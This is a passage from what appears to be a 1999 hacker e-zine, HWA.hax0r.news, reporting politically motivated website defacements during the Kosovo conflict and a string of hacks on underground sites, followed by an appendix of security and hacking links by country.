     Well soon after that pro-yu hack, Hackers Against Communism Klan strike the page
     of Chinese government - http://www.landbridge.gov.cn. They put a message against
     president of Yugoslavia Slobodan Milosevic. The page stated: "I was wondering why
     an intelligent human creature would support an idiotic dictator like Slobodan Milosevic
     ? And I still can't find the answer. He is responsible for hundreds of death's in Kosovo,
     he is nothing more then a Murderer yet he is supported by Hackers. Hackers lost
     their and ethics now they lost their sense of justice. I understand that somebody hate
     U.S. or NATO... that's OK, but this is not an excuse to support terrorist dictators like
     Slobodan Milosevic. Wake up brothers ! He is a dictator and if we don't stop him, he
     will became another Adolph Hitler. And this is the last thing we need right now! Now
     you're gonna ask me why I'm telling all this stuff on a Chinese gov server. Well I don't
     think I could find a serbian gov site these days and China is supporting the Serb
     president so I don't think they gonna mind if I publish my opinion on their site.
     by BHZ, Saturday 27th Mar 1999 on 9:56 pm CET
     As you know, NATO forces are fighting against Yugoslavia. Well some hack groups
     are against it. http://nmimc1.med.navy.mil was hacked and replaced with anti-NATO
     images. Page stated "Russian hackers demand to stop terrorist aggression against
     by BHZ, Sunday 28th Mar 1999 on 3:23 am CET
     Cataharsys is back. After Webfringe and Hack City, they hit The Argon
     -www.theargon.com. So what site will be owned next? Contributed by WHiTe VaMPiRe.
     by BHZ, Monday 29th Mar 1999 on 2:36 pm CET
     Hm, I can say this in one sentence - Catharsys again... 

     by BHZ, Monday 29th Mar 1999 on 10:45 pm CET
     Who are they? They came from anonymity to profile of 5 popular underground sites.
     Yes 5. www.hackedworld.com was hacked today. These hacks are covered with some
     suspicion about the way of servers were hacked... BTW as catharsys said that their
     biggest hack is coming, they posted a message to Hacked World webboard saying
     that Antionline.com is next...


  A.0                              APPENDICES

  A.1  PHACVW, sekurity, security, cyberwar links

       The links are no longer maintained in this file, there is now a
      links section on the http://welcome.to/HWA.hax0r.news/ url so check
      there for current links etc.

      The hack FAQ (The #hack/alt.2600 faq)

      Hacker's Jargon File (The quote file)
      Original jargon file

      New Hacker's Jargon File.
      New jargon file
      Featured site:
      ...... Interesting site check it out, nice
             layout, cool format, cool info.

      International links:(TBC)

      Foreign correspondents and others please send in news site links that
      have security news from foreign countries for inclusion in this list
      thanks... - Ed

      Belgium.......: http://bewoner.dma.be/cum/
      Brasil........: http://www.psynet.net/ka0z
                      http://www.elementais.cjb.net
      Columbia......: http://www.cascabel.8m.com
                      http://www.intrusos.cjb.net
      Indonesia.....: http://www.k-elektronik.org/index2.html
                      http://members.xoom.com/neblonica/
                      http://hackerlink.or.id/
      Netherlands...: http://security.pine.nl/
      Russia........: http://www.tsu.ru/~eugene/
      Singapore.....: http://www.icepoint.com

    Got a link for this section? email it to hwa@press.usmc.net and i'll
    review it and post it here if it merits it.



    © 1998, 1999 (c) Cruciphux/HWA.hax0r.news  (R) { w00t }
    Puzzle answer:  0-1" (the cards are touching.)
                    if the drop in the cable is 25', maximum cable length
                    without a repeater is 50' for standard ethernet coax
                    so therefore the drawing is inaccurate and the cards 
                    are face to face, the thickness of the cable not taken
                    into account.

   [ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]